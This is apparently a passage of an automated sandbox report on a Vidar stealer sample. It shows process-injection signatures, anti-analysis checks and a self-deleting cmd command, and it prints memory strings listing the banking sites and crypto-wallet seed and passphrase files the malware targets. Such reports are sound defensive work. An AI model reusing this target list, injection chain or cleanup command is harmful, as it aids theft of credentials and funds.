                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: FIEGCB.1.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: FIEGCB.1.drBinary or memory string: discord.comVMware20,11696487552f
                  Source: FIEGCB.1.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: FIEGCB.1.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: RegAsm.exe, 00000001.00000002.2526755030.0000000001158000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.00000000010DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: FIEGCB.1.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: global block list test formVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: tasks.office.comVMware20,11696487552o
                  Source: RegAsm.exe, 00000001.00000002.2526666955.0000000000EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarei
                  Source: FIEGCB.1.drBinary or memory string: AMC password management pageVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: FIEGCB.1.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: dev.azure.comVMware20,11696487552j
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: FIEGCB.1.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: FIEGCB.1.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: FIEGCB.1.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: FIEGCB.1.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: FIEGCB.1.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: RegAsm.exe, 00000001.00000002.2526666955.0000000000EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: FIEGCB.1.drBinary or memory string: outlook.office.comVMware20,11696487552s
                  Source: FIEGCB.1.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: FIEGCB.1.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: FIEGCB.1.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: RegAsm.exe, 00000001.00000002.2526755030.0000000001158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWKp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_1-61335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00384E26 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00384E26
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00417645
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038C1CD mov ecx, dword ptr fs:[00000030h]0_2_0038C1CD
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039547E mov eax, dword ptr fs:[00000030h]0_2_0039547E
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00397A7D GetProcessHeap,0_2_00397A7D
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00385095 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00385095
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00384E26 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00384E26
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00388E0B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00388E0B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00384F82 SetUnhandledExceptionFilter,0_2_00384F82
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041937F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041E438 SetUnhandledExceptionFilter,1_2_0041E438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041A8A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC6B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6CC6B66C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC6B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6CC6B1F7

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5072, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4784, type: MEMORYSTR
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_00EE018D
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Searches for specific processes (likely to inject)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_004111BE
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BD7008Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KECBFBAEBKJJ" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00384B4C cpuid 0_2_00384B4C
                  Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0039781B
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00397159
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_003971A4
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_0039723F
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_003972CA
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_0038F3B5
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_0039751D
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00397646
                  Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00396EB7
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_0038EE8F
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_0039774C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00384D20 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00384D20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,1_2_0040FBCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_0040FC92
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: RegAsm.exe, 00000001.00000002.2526755030.0000000001158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3a7ac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3a7ac0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5072, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4784, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: RegAsm.exeString found in binary or memory: exodus.conf.json
                  Source: RegAsm.exeString found in binary or memory: \Exodus\
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exeString found in binary or memory: \Exodus\
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: RegAsm.exe, 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: seed.seco
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet 